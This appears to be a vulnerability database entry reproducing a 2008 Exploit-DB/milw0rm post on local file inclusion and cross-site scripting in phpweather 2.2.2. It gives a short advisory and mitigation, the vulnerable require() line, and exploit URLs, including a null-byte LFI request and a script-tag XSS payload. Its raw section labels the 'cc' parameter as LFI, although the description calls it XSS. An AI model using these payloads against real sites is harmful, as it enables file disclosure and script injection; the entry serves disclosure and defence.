Lfi/xss

vendor:

phpweather

by:

ahmadbady

8.8

CVSS

HIGH

Local File Inclusion/Cross-Site Scripting

22, 79

CWE

Product Name: phpweather

Affected Version From: 2.2.2002

Affected Version To: 2.2.2002

Patch Exists: NO

Related CWE: N/A

CPE: a:phpweather:phpweather:2.2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

A vulnerability exists in phpweather-2.2.2, which can be exploited by malicious people to conduct Local File Inclusion and Cross-Site Scripting attacks. The vulnerability is caused due to the application including user-supplied input without proper sanitization. This can be exploited to include arbitrary local files by passing directory traversal strings to the 'language' parameter in 'test.php' script and to execute arbitrary HTML and script code in a user's browser session in context of an affected site by passing malicious code to the 'cc' parameter in 'index.php' script.

Mitigation:

Input validation should be used to ensure that untrusted input is rejected. Sanitize all user input to prevent malicious code from being executed.

Source

Exploit-DB raw data:

****(Lfi/xss)****

script: phpweather-2.2.2

***************************************************************************
download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0
   
***************************************************************************
vul:
/test.php

line 48:
 require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php");
   
***************************************************
xpl:
www.site.com/path/test.php?metar=()&language=[Lfi]%00
.....................................................
www.site.com/path/index.php?cc=[Lfi]
....................................................
xss:
www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>
..................................................

Author: ahmadbady from:iran

***************************************************

# milw0rm.com [2008-12-14]